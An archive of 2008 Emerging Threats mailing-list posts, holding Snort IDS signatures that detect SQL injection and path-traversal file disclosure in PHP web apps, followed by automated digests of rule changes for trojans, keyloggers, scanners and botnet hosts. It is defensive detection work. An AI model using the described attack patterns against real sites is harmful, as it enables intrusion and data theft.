PHP Autos catid SQL Injection* > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"PHP Autos > catid SQL Injection"; flow:established,to_server; content:"GET "; > depth:4; uricontent:"/searchresults.php?catid="; nocase; > pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:url,www.milw0rm.com/exploits/6696; > reference:url,secunia.com/advisories/32139/; sid:8436; rev:1;) > > > > *2.PHP Realtor v_cat SQL Injection* > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"PHP > Realtor v_cat SQL Injection";flow:established,to_server; content:"GET "; > depth:4; uricontent:"/view_cat.php?v_cat="; nocase; > pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:url,www.milw0rm.com/exploits/6694; > reference:url,secunia.com/advisories/32149/; sid:8437; rev:1;) > > > > *3.JMweb MP3 src Multiple Local File Inclusion* > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"JMweb MP3 > src Multiple Local File Inclusion"; flow:established,to_server; > content:"GET "; depth:4; pcre:"/(listen.php|download.php)/"; > uricontent:"?src="; nocase; pcre:"/(\.\.\/){1,}/"; > classtype:web-application-attack; > reference:url,www.milw0rm.com/exploits/6669; sid:8438; rev:1;) > > > > *4. 
ScriptsEz Easy Image Downloader id File Disclosure* > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ScriptsEz > Easy Image Downloader id File Disclosure"; flow:established,to_server; > content:"GET "; depth:4; uricontent:"main.php?action=download"; nocase; > uricontent:"&id="; nocase; pcre:"/(\.\.\/){1,}/"; > classtype:web-application-attack; > reference:url,www.milw0rm.com/exploits/6715; > reference:url,secunia.com/Advisories/32210/; sid:8439; rev:1;) > > > > *5.Built2go Real Estate Listings event_id SQL Injection* > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Built2go > Real Estate Listings event_id SQL Injection"; > > flow:established,to_server; content:"GET "; depth:4; > uricontent:"/event_detail.php?event_id="; nocase; > pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:url,www.milw0rm.com/exploits/6697; > reference:url,secunia.com/Advisories/32129/; sid:8440; rev:1;) > > > Looking forward for your comments if any... > > Thanks & Regards, > StillSecure > > > ------------------------------------------------------------------------ > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From emerging at emergingthreats.net Sat Oct 11 16:00:09 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Sat, 11 Oct 2008 16:00:09 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081011200009.0414045026@goliath.jonkmans.com> [***] Results from Oinkmaster started Sat Oct 11 16:00:08 2008 [***] [+++] Added rules: [+++] 2008648 - ET WEB_SPECIFIC trac q variable open redirect 
(emerging-web_sql_injection.rules) 2008649 - ET WEB_SPECIFIC Realtor v_cat SQL Injection (emerging-web_sql_injection.rules) 2008650 - ET WEB_SPECIFIC Autos catid SQL Injection (emerging-web_sql_injection.rules) 2008651 - ET WEB_SPECIFIC JMweb MP3 src Multiple Local File Inclusion (emerging-web_sql_injection.rules) 2008652 - ET WEB_SPECIFIC ScriptsEz Easy Image Downloader id File Disclosure (emerging-web_sql_injection.rules) 2008653 - ET WEB_SPECIFIC Built2go Real Estate Listings event_id SQL Injection (emerging-web_sql_injection.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-sid-msg.map (6): 2008648 || ET WEB_SPECIFIC trac q variable open redirect || url,cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2951 2008649 || ET WEB_SPECIFIC Realtor v_cat SQL Injection || url,secunia.com/advisories/32149/ || url,www.milw0rm.com/exploits/6694 2008650 || ET WEB_SPECIFIC Autos catid SQL Injection || url,secunia.com/advisories/32139/ || url,www.milw0rm.com/exploits/6696 2008651 || ET WEB_SPECIFIC JMweb MP3 src Multiple Local File Inclusion || url,www.milw0rm.com/exploits/6669 2008652 || ET WEB_SPECIFIC ScriptsEz Easy Image Downloader id File Disclosure || url,secunia.com/Advisories/32210/ || url,www.milw0rm.com/exploits/6715 2008653 || ET WEB_SPECIFIC Built2go Real Estate Listings event_id SQL Injection || url,secunia.com/Advisories/32129/ || url,www.milw0rm.com/exploits/6697 -> Added to emerging-sid-msg.map.txt (6): 2008648 || ET WEB_SPECIFIC trac q variable open redirect || url,cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2951 2008649 || ET WEB_SPECIFIC Realtor v_cat SQL Injection || url,secunia.com/advisories/32149/ || url,www.milw0rm.com/exploits/6694 2008650 || ET WEB_SPECIFIC Autos catid SQL Injection || url,secunia.com/advisories/32139/ || url,www.milw0rm.com/exploits/6696 2008651 || ET WEB_SPECIFIC JMweb MP3 src Multiple Local File Inclusion || url,www.milw0rm.com/exploits/6669 2008652 || ET WEB_SPECIFIC ScriptsEz Easy Image Downloader id File 
Disclosure || url,secunia.com/Advisories/32210/ || url,www.milw0rm.com/exploits/6715 2008653 || ET WEB_SPECIFIC Built2go Real Estate Listings event_id SQL Injection || url,secunia.com/Advisories/32129/ || url,www.milw0rm.com/exploits/6697 -> Added to emerging-web_sql_injection.rules (1): #by Russ McRee [---] Removed non-rule lines: [---] -> Removed from emerging-sid-msg.map (10): 2500067 || ET COMPROMISED Known Compromised or Hostile Host Traffic (68) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500068 || ET COMPROMISED Known Compromised or Hostile Host Traffic (69) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500069 || ET COMPROMISED Known Compromised or Hostile Host Traffic (70) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500070 || ET COMPROMISED Known Compromised or Hostile Host Traffic (71) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500071 || ET COMPROMISED Known Compromised or Hostile Host Traffic (72) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510067 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (68) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510068 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (69) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510069 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (70) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510070 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (71) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510071 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (72) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (10): 2500067 || ET COMPROMISED Known Compromised or Hostile Host Traffic (68) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500068 || ET COMPROMISED 
Known Compromised or Hostile Host Traffic (69) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500069 || ET COMPROMISED Known Compromised or Hostile Host Traffic (70) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500070 || ET COMPROMISED Known Compromised or Hostile Host Traffic (71) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500071 || ET COMPROMISED Known Compromised or Hostile Host Traffic (72) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510067 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (68) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510068 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (69) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510069 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (70) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510070 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (71) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510071 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (72) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From emerging at emergingthreats.net Sat Oct 11 18:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Sat, 11 Oct 2008 18:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Weekly Signature Changes Message-ID: <20081011220008.2562345026@goliath.jonkmans.com> [***] Results from Oinkmaster started Sat Oct 11 18:00:08 2008 [***] [+++] Added rules: [+++] 2008546 - ET TROJAN Downloader.vr Checkin part 1 of 2 (emerging-virus.rules) 2008618 - ET DOS IAS Helper COM Component iashlpr.dll activex remote DOS (emerging-dos.rules) 2008619 - ET EXPLOIT Novell ZENWorks for Desktops Remote Heap-Based Buffer Overflow (emerging-exploit.rules) 2008620 - ET EXPLOIT Internet Information Service iisext.dll activex 
setpassword Insecure Method (emerging-exploit.rules) 2008621 - ET EXPLOIT Internet Information Service adsiis.dll activex remote DOS (emerging-exploit.rules) 2008622 - ET WEB Pritlog index.php filename File Disclosure (emerging-web.rules) 2008623 - ET TROJAN Cinmus.Checkin 1 (emerging-virus.rules) 2008624 - ET TROJAN Cinmus.Checkin 2 (emerging-virus.rules) 2008625 - ET P2P Pando Client User-Agent Detected (Mozilla/4.0 (Windows\; U) Pando/1.xx) (emerging-p2p.rules) 2008626 - ET TROJAN PlayMP3z.biz Related Spyware/Trojan Install Report (emerging-virus.rules) 2008627 - ET SCAN Httprecon Web Server Fingerprint Scan (emerging-scan.rules) 2008628 - ET SCAN WSFuzzer Web Application Fuzzing (emerging-scan.rules) 2008629 - ET SCAN Wikto Backend Data Miner Scan (emerging-scan.rules) 2008639 - ET TROJAN Tibs Trojan Downloader (emerging-virus.rules) 2008640 - ET SCAN SIP erase_registrations/add registrations attempt (emerging-voip.rules) 2008641 - ET SCAN sipscan probe (emerging-voip.rules) 2008642 - ET TROJAN Keylogger PRO GOLD Post (emerging-virus.rules) 2008643 - ET MALWARE Suspicious User-Agent Detected (Downloader1.2) (emerging-malware.rules) 2008644 - ET TROJAN Spy-Net Trojan Connection (emerging-virus.rules) 2008645 - ET TROJAN Spy-Net Trojan Connection (2) (emerging-virus.rules) 2008646 - ET CURRENT_EVENTS Trojan resulting from Fake MS Updates Email Login to CnC (emerging.rules) 2008647 - ET MALWARE Internet-antivirus.com Related Fake AV User-Agent Detected (Update Internet Antivirus) (emerging-malware.rules) 2008648 - ET WEB_SPECIFIC trac q variable open redirect (emerging-web_sql_injection.rules) 2008649 - ET WEB_SPECIFIC Realtor v_cat SQL Injection (emerging-web_sql_injection.rules) 2008650 - ET WEB_SPECIFIC Autos catid SQL Injection (emerging-web_sql_injection.rules) 2008651 - ET WEB_SPECIFIC JMweb MP3 src Multiple Local File Inclusion (emerging-web_sql_injection.rules) 2008652 - ET WEB_SPECIFIC ScriptsEz Easy Image Downloader id File Disclosure 
(emerging-web_sql_injection.rules) 2008653 - ET WEB_SPECIFIC Built2go Real Estate Listings event_id SQL Injection (emerging-web_sql_injection.rules) 2406029 - ET RBN Known Russian Business Network Monitored Domains (30) (emerging-rbn.rules) 2406030 - ET RBN Known Russian Business Network Monitored Domains (31) (emerging-rbn.rules) 2406031 - ET RBN Known Russian Business Network Monitored Domains (32) (emerging-rbn.rules) 2407029 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (30) (emerging-rbn-BLOCK.rules) 2407030 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (31) (emerging-rbn-BLOCK.rules) 2407031 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (32) (emerging-rbn-BLOCK.rules) [///] Modified active rules: [///] 2001980 - ET POLICY SSH Client Banner Detected on Unusual Port (emerging-policy.rules) 2002916 - ET EXPLOIT RealVNC Authentication Bypass Attempt (emerging-exploit.rules) 2003466 - ET WEB PHP Attack Tool Morfeus F Scanner (emerging-web.rules) 2008415 - ET SCAN Cisco Torch IOS HTTP Scan (emerging-scan.rules) 2008564 - ET MALWARE Suspicious User-Agent (Internet HTTP Request) (emerging-malware.rules) 2400000 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400001 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400002 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400003 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400004 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400005 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400006 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400007 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2401000 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401001 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE 
(emerging-drop-BLOCK.rules) 2401002 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401003 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401004 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401005 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401006 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401007 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2402000 - ET DROP Dshield Block Listed Source (emerging-dshield.rules) 2403000 - ET DROP Dshield Block Listed Source - BLOCKING (emerging-dshield-BLOCK.rules) 2404000 - ET DROP Known Bot C&C Server Traffic (group 1) (emerging-botcc.rules) 2404001 - ET DROP Known Bot C&C Server Traffic (group 2) (emerging-botcc.rules) 2404002 - ET DROP Known Bot C&C Server Traffic (group 3) (emerging-botcc.rules) 2404003 - ET DROP Known Bot C&C Server Traffic (group 4) (emerging-botcc.rules) 2404004 - ET DROP Known Bot C&C Server Traffic (group 5) (emerging-botcc.rules) 2404005 - ET DROP Known Bot C&C Server Traffic (group 6) (emerging-botcc.rules) 2404006 - ET DROP Known Bot C&C Server Traffic (group 7) (emerging-botcc.rules) 2404007 - ET DROP Known Bot C&C Server Traffic (group 8) (emerging-botcc.rules) 2404008 - ET DROP Known Bot C&C Server Traffic (group 9) (emerging-botcc.rules) 2404009 - ET DROP Known Bot C&C Server Traffic (group 10) (emerging-botcc.rules) 2404010 - ET DROP Known Bot C&C Server Traffic (group 11) (emerging-botcc.rules) 2404011 - ET DROP Known Bot C&C Server Traffic (group 12) (emerging-botcc.rules) 2404012 - ET DROP Known Bot C&C Server Traffic (group 13) (emerging-botcc.rules) 2404013 - ET DROP Known Bot C&C Server Traffic (group 14) (emerging-botcc.rules) 2404014 - ET DROP Known Bot C&C Server Traffic (group 15) (emerging-botcc.rules) 
2404015 - ET DROP Known Bot C&C Server Traffic (group 16) (emerging-botcc.rules) 2404016 - ET DROP Known Bot C&C Server Traffic (group 17) (emerging-botcc.rules) 2404017 - ET DROP Known Bot C&C Server Traffic (group 18) (emerging-botcc.rules) 2404018 - ET DROP Known Bot C&C Server Traffic (group 19) (emerging-botcc.rules) 2404019 - ET DROP Known Bot C&C Server Traffic (group 20) (emerging-botcc.rules) 2405000 - ET DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405001 - ET DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405002 - ET DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405003 - ET DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405004 - ET DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405005 - ET DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405006 - ET DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405007 - ET DROP Known Bot C&C Traffic (group 8) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405008 - ET DROP Known Bot C&C Traffic (group 9) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405009 - ET DROP Known Bot C&C Traffic (group 10) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405010 - ET DROP Known Bot C&C Traffic (group 11) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405011 - ET DROP Known Bot C&C Traffic (group 12) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405012 - ET DROP Known Bot C&C Traffic (group 13) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405013 - ET DROP Known Bot C&C Traffic (group 14) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405014 - ET DROP Known Bot C&C Traffic (group 15) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405015 - ET DROP Known Bot C&C Traffic (group 16) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405016 - ET DROP Known Bot C&C 
Traffic (group 17) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405017 - ET DROP Known Bot C&C Traffic (group 18) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405018 - ET DROP Known Bot C&C Traffic (group 19) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405019 - ET DROP Known Bot C&C Traffic (group 20) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2406000 - ET RBN Known Russian Business Network Monitored Domains (1) (emerging-rbn.rules) 2406001 - ET RBN Known Russian Business Network Monitored Domains (2) (emerging-rbn.rules) 2406002 - ET RBN Known Russian Business Network Monitored Domains (3) (emerging-rbn.rules) 2406003 - ET RBN Known Russian Business Network Monitored Domains (4) (emerging-rbn.rules) 2406004 - ET RBN Known Russian Business Network Monitored Domains (5) (emerging-rbn.rules) 2406005 - ET RBN Known Russian Business Network Monitored Domains (6) (emerging-rbn.rules) 2406006 - ET RBN Known Russian Business Network Monitored Domains (7) (emerging-rbn.rules) 2406007 - ET RBN Known Russian Business Network Monitored Domains (8) (emerging-rbn.rules) 2406008 - ET RBN Known Russian Business Network Monitored Domains (9) (emerging-rbn.rules) 2406009 - ET RBN Known Russian Business Network Monitored Domains (10) (emerging-rbn.rules) 2406010 - ET RBN Known Russian Business Network Monitored Domains (11) (emerging-rbn.rules) 2406011 - ET RBN Known Russian Business Network Monitored Domains (12) (emerging-rbn.rules) 2406012 - ET RBN Known Russian Business Network Monitored Domains (13) (emerging-rbn.rules) 2406013 - ET RBN Known Russian Business Network Monitored Domains (14) (emerging-rbn.rules) 2406014 - ET RBN Known Russian Business Network Monitored Domains (15) (emerging-rbn.rules) 2406015 - ET RBN Known Russian Business Network Monitored Domains (16) (emerging-rbn.rules) 2406016 - ET RBN Known Russian Business Network Monitored Domains (17) (emerging-rbn.rules) 2406017 - ET RBN Known Russian Business Network Monitored Domains (18) 
(emerging-rbn.rules) 2406018 - ET RBN Known Russian Business Network Monitored Domains (19) (emerging-rbn.rules) 2406019 - ET RBN Known Russian Business Network Monitored Domains (20) (emerging-rbn.rules) 2406020 - ET RBN Known Russian Business Network Monitored Domains (21) (emerging-rbn.rules) 2406021 - ET RBN Known Russian Business Network Monitored Domains (22) (emerging-rbn.rules) 2406022 - ET RBN Known Russian Business Network Monitored Domains (23) (emerging-rbn.rules) 2406023 - ET RBN Known Russian Business Network Monitored Domains (24) (emerging-rbn.rules) 2406024 - ET RBN Known Russian Business Network Monitored Domains (25) (emerging-rbn.rules) 2406025 - ET RBN Known Russian Business Network Monitored Domains (26) (emerging-rbn.rules) 2406026 - ET RBN Known Russian Business Network Monitored Domains (27) (emerging-rbn.rules) 2406027 - ET RBN Known Russian Business Network Monitored Domains (28) (emerging-rbn.rules) 2406028 - ET RBN Known Russian Business Network Monitored Domains (29) (emerging-rbn.rules) 2407000 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (1) (emerging-rbn-BLOCK.rules) 2407001 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (2) (emerging-rbn-BLOCK.rules) 2407002 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (3) (emerging-rbn-BLOCK.rules) 2407003 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (4) (emerging-rbn-BLOCK.rules) 2407004 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (5) (emerging-rbn-BLOCK.rules) 2407005 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (6) (emerging-rbn-BLOCK.rules) 2407006 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (7) (emerging-rbn-BLOCK.rules) 2407007 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (8) (emerging-rbn-BLOCK.rules) 2407008 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (9) 
(emerging-rbn-BLOCK.rules) 2407009 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (10) (emerging-rbn-BLOCK.rules) 2407010 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (11) (emerging-rbn-BLOCK.rules) 2407011 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (12) (emerging-rbn-BLOCK.rules) 2407012 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (13) (emerging-rbn-BLOCK.rules) 2407013 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (14) (emerging-rbn-BLOCK.rules) 2407014 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (15) (emerging-rbn-BLOCK.rules) 2407015 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (16) (emerging-rbn-BLOCK.rules) 2407016 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (17) (emerging-rbn-BLOCK.rules) 2407017 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (18) (emerging-rbn-BLOCK.rules) 2407018 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (19) (emerging-rbn-BLOCK.rules) 2407019 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (20) (emerging-rbn-BLOCK.rules) 2407020 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (21) (emerging-rbn-BLOCK.rules) 2407021 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (22) (emerging-rbn-BLOCK.rules) 2407022 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (23) (emerging-rbn-BLOCK.rules) 2407023 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (24) (emerging-rbn-BLOCK.rules) 2407024 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (25) (emerging-rbn-BLOCK.rules) 2407025 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (26) (emerging-rbn-BLOCK.rules) 2407026 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (27) (emerging-rbn-BLOCK.rules) 2407027 - 
ET RBN Known Russian Business Network Monitored Domains - BLOCKING (28) (emerging-rbn-BLOCK.rules) 2407028 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (29) (emerging-rbn-BLOCK.rules) [---] Removed rules: [---] 2008546 - ET CURRENT_EVENTS Unknown Downloader Checkin part 1 of 2 (emerging.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-dos.rules (1): #by Stillsecure (stillsecure.com) -> Added to emerging-drop-BLOCK.rules (2): # VERSION 1323 # Generated 2008-10-11 00:03:02 EDT -> Added to emerging-drop.rules (2): # VERSION 1323 # Generated 2008-10-11 00:03:02 EDT -> Added to emerging-exploit.rules (2): #by Stillsecure (stillsecure.com) #by Stillsecure (www.stillsecure.com) -> Added to emerging-p2p.rules (1): #by dxp -> Added to emerging-rbn-BLOCK.rules (2): # VERSION 80 # Updated 2008-10-08 09:28:13 -> Added to emerging-rbn.rules (2): # VERSION 80 # Updated 2008-10-08 09:28:13 -> Added to emerging-sid-msg.map (35): 2002916 || ET EXPLOIT RealVNC Authentication Bypass Attempt || cve,2006-2369 || url,archives.neohapsis.com/archives/fulldisclosure/2006-05/0356.html || url,secunia.com/advisories/20107/ 2008546 || ET TROJAN Downloader.vr Checkin part 1 of 2 2008618 || ET DOS IAS Helper COM Component iashlpr.dll activex remote DOS || url,securityreason.com/securityalert/4323 || cve,2008-2639 || url,www.securityfocus.com/archive/1/archive/1/496695/100/0/threaded 2008619 || ET EXPLOIT Novell ZENWorks for Desktops Remote Heap-Based Buffer Overflow || url,securitytracker.com/alerts/2008/Sep/1020951.html || bugtraq,31435 2008620 || ET EXPLOIT Internet Information Service iisext.dll activex setpassword Insecure Method || url,www.securityfocus.com/archive/1/archive/1/496694/100/0/threaded || cve,2008-4301 2008621 || ET EXPLOIT Internet Information Service adsiis.dll activex remote DOS || url,securityreason.com/securityalert/4325 || cve,2008-4300 2008622 || ET WEB Pritlog index.php filename File Disclosure || url,www.milw0rm.com/exploits/6613 || 
url,secunia.com/Advisories/31969/ 2008623 || ET TROJAN Cinmus.Checkin 1 2008624 || ET TROJAN Cinmus.Checkin 2 2008625 || ET P2P Pando Client User-Agent Detected (Mozilla/4.0 (Windows\; U) Pando/1.xx) 2008626 || ET TROJAN PlayMP3z.biz Related Spyware/Trojan Install Report 2008627 || ET SCAN Httprecon Web Server Fingerprint Scan || url,www.computec.ch/projekte/httprecon/ 2008628 || ET SCAN WSFuzzer Web Application Fuzzing || url,www.owasp.org/index.php/Category\:OWASP_WSFuzzer_Project 2008629 || ET SCAN Wikto Backend Data Miner Scan || url,www.sensepost.com/research/wikto/WiktoDoc1-51.htm 2008639 || ET TROJAN Tibs Trojan Downloader 2008640 || ET SCAN SIP erase_registrations/add registrations attempt || url,www.hackingvoip.com/sec_tools.html 2008641 || ET SCAN sipscan probe || url,www.hackingvoip.com/sec_tools.html 2008642 || ET TROJAN Keylogger PRO GOLD Post 2008643 || ET MALWARE Suspicious User-Agent Detected (Downloader1.2) 2008644 || ET TROJAN Spy-Net Trojan Connection 2008645 || ET TROJAN Spy-Net Trojan Connection (2) 2008646 || ET CURRENT_EVENTS Trojan resulting from Fake MS Updates Email Login to CnC || url,isc.sans.org/diary.html?storyid=5159 2008647 || ET MALWARE Internet-antivirus.com Related Fake AV User-Agent Detected (Update Internet Antivirus) 2008648 || ET WEB_SPECIFIC trac q variable open redirect || url,cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2951 2008649 || ET WEB_SPECIFIC Realtor v_cat SQL Injection || url,secunia.com/advisories/32149/ || url,www.milw0rm.com/exploits/6694 2008650 || ET WEB_SPECIFIC Autos catid SQL Injection || url,secunia.com/advisories/32139/ || url,www.milw0rm.com/exploits/6696 2008651 || ET WEB_SPECIFIC JMweb MP3 src Multiple Local File Inclusion || url,www.milw0rm.com/exploits/6669 2008652 || ET WEB_SPECIFIC ScriptsEz Easy Image Downloader id File Disclosure || url,secunia.com/Advisories/32210/ || url,www.milw0rm.com/exploits/6715 2008653 || ET WEB_SPECIFIC Built2go Real Estate Listings event_id SQL Injection || 
url,secunia.com/Advisories/32129/ || url,www.milw0rm.com/exploits/6697 2406029 || ET RBN Known Russian Business Network Monitored Domains (30) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406030 || ET RBN Known Russian Business Network Monitored Domains (31) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406031 || ET RBN Known Russian Business Network Monitored Domains (32) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407029 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (30) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407030 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (31) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407031 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (32) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork -> Added to emerging-sid-msg.map.txt (35): 2002916 || ET EXPLOIT RealVNC Authentication Bypass Attempt || cve,2006-2369 || url,archives.neohapsis.com/archives/fulldisclosure/2006-05/0356.html || url,secunia.com/advisories/20107/ 2008546 || ET TROJAN Downloader.vr Checkin part 1 of 2 2008618 || ET DOS IAS Helper COM Component iashlpr.dll activex remote DOS || url,securityreason.com/securityalert/4323 || cve,2008-2639 || url,www.securityfocus.com/archive/1/archive/1/496695/100/0/threaded 2008619 || ET EXPLOIT Novell ZENWorks for Desktops Remote Heap-Based Buffer Overflow || url,securitytracker.com/alerts/2008/Sep/1020951.html || bugtraq,31435 2008620 || ET EXPLOIT Internet Information Service iisext.dll activex setpassword Insecure Method || url,www.securityfocus.com/archive/1/archive/1/496694/100/0/threaded || cve,2008-4301 2008621 || ET EXPLOIT Internet Information Service adsiis.dll activex remote DOS || url,securityreason.com/securityalert/4325 || cve,2008-4300 2008622 || ET WEB Pritlog index.php filename File Disclosure || 
